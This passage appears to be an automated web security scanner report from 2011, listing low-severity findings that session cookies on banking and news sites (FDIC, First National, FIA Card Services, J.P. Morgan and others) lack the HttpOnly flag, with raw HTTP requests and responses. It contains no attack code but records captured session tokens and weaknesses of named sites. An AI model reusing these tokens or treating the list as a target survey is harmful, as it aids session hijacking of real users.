The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.fdic.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:18:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 43093
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSBRDRBD=IBKPGPIAFCHAEGEBGLLPBOMO; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...

11.119. http://www.firstnational.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.firstnational.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.firstnational.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Date: Wed, 02 Feb 2011 21:59:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.firstnational.com/001/html/en/personal/personal.html
Content-Length: 184
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.firstnational.com/001/html/en/personal/personal.html">here</a>.</body>

11.120. http://www.firstnational.com/config/html/en/searchresults.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.firstnational.com
Path:   /config/html/en/searchresults.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /config/html/en/searchresults.asp HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:41:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 25669
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQASASQCD=FHHAGHGAJJNGHOEBODOGIMJG; path=/
Cache-control: private


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

11.121. http://www.firstnational.com/config/html/en/setcookie.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.firstnational.com
Path:   /config/html/en/setcookie.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /config/html/en/setcookie.asp?default=personal HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Wed, 02 Feb 2011 22:19:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /001/html/en/personal/personal.html
Content-Length: 156
Content-Type: text/html
Set-Cookie: fnbDefault=personal; expires=Thu, 02-Feb-2012 06:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDQASASQCD=OBDAGHGAEBGAPCBHABGIEIIP; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/001/html/en/personal/personal.html">here</a>.</body>

11.122. http://www.firstnationalinvestmentsandplanning.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.firstnationalinvestmentsandplanning.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.firstnationalinvestmentsandplanning.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Wed, 02 Feb 2011 22:19:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /home/default.asp
Content-Length: 138
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSDBQTCD=EDPHJCGACBBDPAOLPJNIMGPO; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/home/default.asp">here</a>.</body>

11.123. http://www.fis.com/fis/worldnews/worldnews.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.fis.com
Path:   /fis/worldnews/worldnews.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fis/worldnews/worldnews.asp HTTP/1.1
Host: www.fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 00:58:54 GMT
Connection: close
Content-Length: 83551
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCASTCAST=PMHBFPGBGMDOPCOGKGMJMGLM; path=/
Cache-control: private


<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">
   <meta http-equiv="refresh" content="1800">
   <title>FIS - Worldnews - Icelandic Group still up for grabs</title
...[SNIP]...

11.124. http://www.forum-software.org/tag/ipboard  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.forum-software.org
Path:   /tag/ipboard

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tag/ipboard HTTP/1.1
Host: www.forum-software.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:47 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6.7
Set-Cookie: SESS280d8e8069f9a940cd2b7fa808fc752e=0d50d9dee0f91c069baeb303e13f8523; expires=Sat, 26-Feb-2011 04:40:07 GMT; path=/; domain=.forum-software.org
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 01:06:47 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv="Conte
...[SNIP]...

11.125. http://www.grist.org/article/food-2011-01-11-boycotting-bluefin-isnt-enough-time-to-turn-on-the-siren  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.grist.org
Path:   /article/food-2011-01-11-boycotting-bluefin-isnt-enough-time-to-turn-on-the-siren

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /article/food-2011-01-11-boycotting-bluefin-isnt-enough-time-to-turn-on-the-siren HTTP/1.1
Host: www.grist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 01:15:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Set-Cookie: PHPSESSID=394bce86b159c0f351253ee87caa8df9; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_visit=981364550; expires=Fri, 03-Feb-2012 01:15:50 GMT; path=/; domain=.grist.org
Set-Cookie: exp_last_activity=1296724550; expires=Fri, 03-Feb-2012 01:15:50 GMT; path=/; domain=.grist.org
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A82%3A%22%2Farticle%2Ffood-2011-01-11-boycotting-bluefin-isnt-enough-time-to-turn-on-the-siren%2F%22%3B%7D; path=/; domain=.grist.org
Last-Modified: Thu, 03 Feb 2011 01:15:50 GMT
Content-Type: text/html
X-Cache: MISS from grist-squid02.prod.grist.org
X-Cache-Lookup: MISS from grist-squid02.prod.grist.org:80
Via: 1.0 grist-squid02.prod.grist.org (squid/3.1.8)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.faceb
...[SNIP]...

11.126. https://www.ibsnetaccess.com/NASApp/NetAccess/AboutDisplay  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.ibsnetaccess.com
Path:   /NASApp/NetAccess/AboutDisplay

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /NASApp/NetAccess/AboutDisplay HTTP/1.1
Host: www.ibsnetaccess.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000UNiRaq4SV-vGMcUowkf6zr5:15bs25f24; origin=https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay; TLTUID=C697A0BA2F17102F003A8D446414B7D1; URLNamespace=ibsnetaccess; TLTSID=C697A0BA2F17102F003A8D446414B7D1;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:24 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Set-Cookie: JSESSIONID=0000OPVUXvnLQWTsNmxnOsJOjeV:15bs25f24; Path=/; Secure
Cache-Control: no-store, no-cache=set-cookie
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 13482


<html lang="en">

<head>
<title>FIA Card Services Net Access: About Net Access</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />


<meta name="ke
...[SNIP]...

11.127. https://www.ibsnetaccess.com/NASApp/NetAccess/ContactsDisplay  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.ibsnetaccess.com
Path:   /NASApp/NetAccess/ContactsDisplay

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /NASApp/NetAccess/ContactsDisplay HTTP/1.1
Host: www.ibsnetaccess.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000UNiRaq4SV-vGMcUowkf6zr5:15bs25f24; origin=https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay; TLTUID=C697A0BA2F17102F003A8D446414B7D1; URLNamespace=ibsnetaccess; TLTSID=C697A0BA2F17102F003A8D446414B7D1;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:25 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Set-Cookie: JSESSIONID=0000SvWETqda1i7_tKHrr3Sv1oz:15bs25f24; Path=/; Secure
Cache-Control: no-store, no-cache=set-cookie
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 50683


<html lang="en">

<head>
<title>FIA Card Services Net Access: Contact Us</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />


<meta name="keywords
...[SNIP]...

11.128. https://www.ibsnetaccess.com/NASApp/NetAccess/DisplayScreen  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.ibsnetaccess.com
Path:   /NASApp/NetAccess/DisplayScreen

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /NASApp/NetAccess/DisplayScreen HTTP/1.1
Host: www.ibsnetaccess.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000UNiRaq4SV-vGMcUowkf6zr5:15bs25f24; origin=https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay; TLTUID=C697A0BA2F17102F003A8D446414B7D1; URLNamespace=ibsnetaccess; TLTSID=C697A0BA2F17102F003A8D446414B7D1;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:24 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Set-Cookie: JSESSIONID=0000uaCptzS4RqcUf5UlN91Tkfl:15bs25f24; Path=/; Secure
Cache-Control: no-store, no-cache=set-cookie
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 5528


<html lang="en">

<head>
<title>FIA Card Services Net Access: Server Unavailable</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />


<meta name="
...[SNIP]...

11.129. https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.ibsnetaccess.com
Path:   /NASApp/NetAccess/LoginDisplay

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /NASApp/NetAccess/LoginDisplay HTTP/1.1
Host: www.ibsnetaccess.com
Connection: keep-alive
Referer: http://www.ibsnetaccess.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C697A0BA2F17102F003A8D446414B7D1; TLTUID=C697A0BA2F17102F003A8D446414B7D1

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:31 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Set-Cookie: JSESSIONID=0000BHszS04SY5-X0eDWZcYPdQk:15bs25f24; Path=/; Secure
Set-Cookie: JSESSIONID=0000UNiRaq4SV-vGMcUowkf6zr5:15bs25f24; Path=/; Secure
Set-Cookie: URLNamespace=ibsnetaccess
Set-Cookie: origin=https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay
Cache-Control: no-store, no-cache=set-cookie
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 15997


<html lang="en">

<head>
<title>FIA Card Services Net Access: Log In</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />


<meta name="keywords" co
...[SNIP]...

11.130. https://www.ibsnetaccess.com/NASApp/NetAccess/LoginValidation  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.ibsnetaccess.com
Path:   /NASApp/NetAccess/LoginValidation

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /NASApp/NetAccess/LoginValidation HTTP/1.1
Host: www.ibsnetaccess.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000UNiRaq4SV-vGMcUowkf6zr5:15bs25f24; origin=https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay; TLTUID=C697A0BA2F17102F003A8D446414B7D1; URLNamespace=ibsnetaccess; TLTSID=C697A0BA2F17102F003A8D446414B7D1;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:27 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000S2Q7Etp_lSrb_lYGF1ZPcz6:15bs25f24; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 16003


<html lang="en">

<head>
<title>FIA Card Services Net Access: Log In Error</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />


<meta name="keywor
...[SNIP]...

11.131. https://www.ibsnetaccess.com/NASApp/NetAccess/PreAuthentication  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.ibsnetaccess.com
Path:   /NASApp/NetAccess/PreAuthentication

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /NASApp/NetAccess/PreAuthentication HTTP/1.1
Host: www.ibsnetaccess.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000UNiRaq4SV-vGMcUowkf6zr5:15bs25f24; origin=https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay; TLTUID=C697A0BA2F17102F003A8D446414B7D1; URLNamespace=ibsnetaccess; TLTSID=C697A0BA2F17102F003A8D446414B7D1;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:21 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Set-Cookie: JSESSIONID=0000dPT7JwmMY0OXpSKUutpWwl4:15bs25f24; Path=/; Secure
Cache-Control: no-store, no-cache=set-cookie
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 9179


<html lang="en">

<head>
<title>FIA Card Services Net Access: Registration</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />


<meta name="keywor
...[SNIP]...

11.132. https://www.ibsnetaccess.com/NASApp/NetAccess/TermsOfUseDisplay  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.ibsnetaccess.com
Path:   /NASApp/NetAccess/TermsOfUseDisplay

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /NASApp/NetAccess/TermsOfUseDisplay HTTP/1.1
Host: www.ibsnetaccess.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000UNiRaq4SV-vGMcUowkf6zr5:15bs25f24; origin=https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay; TLTUID=C697A0BA2F17102F003A8D446414B7D1; URLNamespace=ibsnetaccess; TLTSID=C697A0BA2F17102F003A8D446414B7D1;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:26 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Set-Cookie: JSESSIONID=00001XDvv31_zmrc9v6Tt1PrDw0:15bs25f24; Path=/; Secure
Cache-Control: no-store, no-cache=set-cookie
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 22822


<html lang="en">

<head>
<title>FIA Card Services Net Access: Terms of Use</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />


<meta name="keywor
...[SNIP]...

11.133. https://www.ibsnetaccess.com/NASApp/NetAccess/popupAction.action  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.ibsnetaccess.com
Path:   /NASApp/NetAccess/popupAction.action

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /NASApp/NetAccess/popupAction.action HTTP/1.1
Host: www.ibsnetaccess.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000UNiRaq4SV-vGMcUowkf6zr5:15bs25f24; origin=https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay; TLTUID=C697A0BA2F17102F003A8D446414B7D1; URLNamespace=ibsnetaccess; TLTSID=C697A0BA2F17102F003A8D446414B7D1;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:20 GMT
Server: IBM_HTTP_Server
Content-Length: 0
Set-Cookie: JSESSIONID=000012ZpG3MaDEXER8Vm_WoG-co:15bs25f24; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/plain
Content-Language: en-US


11.134. http://www.journalpioneer.com/News/Local/2011-02-01/article-2189851/Premiers-Cup-goes-to-Northport-fisher/1  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.journalpioneer.com
Path:   /News/Local/2011-02-01/article-2189851/Premiers-Cup-goes-to-Northport-fisher/1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /News/Local/2011-02-01/article-2189851/Premiers-Cup-goes-to-Northport-fisher/1 HTTP/1.1
Host: www.journalpioneer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:42 GMT
Set-Cookie: PHPSESSID=b01a1100153421468e753ab4f672b414; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, public
Pragma: no-cache
Keep-Alive: timeout=15, max=9982
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Set-Cookie: NSC_M4_qse_vojt=ffffffffc3a09c6445525d5f4f58455e445a4a423660;path=/;httponly
Content-Length: 60632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head>

<title>Premi
...[SNIP]...

11.135. http://www.jpmorgan.com/cm/Satellite  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.jpmorgan.com
Path:   /cm/Satellite

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cm/Satellite?c=JPM_Stylesheet_C&cid=1153920691252&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACE_COOKIE=R2666079405; JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Fri, 04-Feb-2011 00:24:08 GMT
Date: Thu, 03 Feb 2011 00:07:24 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: JpmcSession=dGGvNJxcGh2xhXjnF1JqhCZ4Ljh3M5mCNBT3J8BqsXfzcQ0M5J7F!-1882927501; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: text/css
Content-Length: 12349


/* Global (utility) nav styling */

div#globalNav div#utilSearch ul {
   padding-left: 14px; /* to make room for corner img */
}

/* Container and Container content styles */


...[SNIP]...

11.136. http://www.jpmorgan.com/pages/jpmorgan  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.jpmorgan.com
Path:   /pages/jpmorgan

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/jpmorgan HTTP/1.1
Host: www.jpmorgan.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2975777359; path=/; expires=Thu, 03-Feb-2011 22:26:48 GMT
Date: Wed, 02 Feb 2011 22:19:27 GMT
Cache-Control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: JpmcSession=GnrDNJYP3rQ6L11G2synp0JL6JxHXW9TGdB8vMPC1NQGLx57M16r!-1967453422; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   <title>J.P. Morg
...[SNIP]...

11.137. http://www.jpmorgan.com/pages/jpmorgan/home/business  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.jpmorgan.com
Path:   /pages/jpmorgan/home/business

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/jpmorgan/home/business HTTP/1.1
Host: www.jpmorgan.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501;

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Fri, 04-Feb-2011 01:34:32 GMT
Date: Thu, 03 Feb 2011 01:16:45 GMT
Cache-Control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: JpmcSession=nMmqNKBd14mKjKprddLgg5LQG3W84YhRbtH7cwbSXg0JbGWdDwn2!-1882927501; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http:
...[SNIP]...

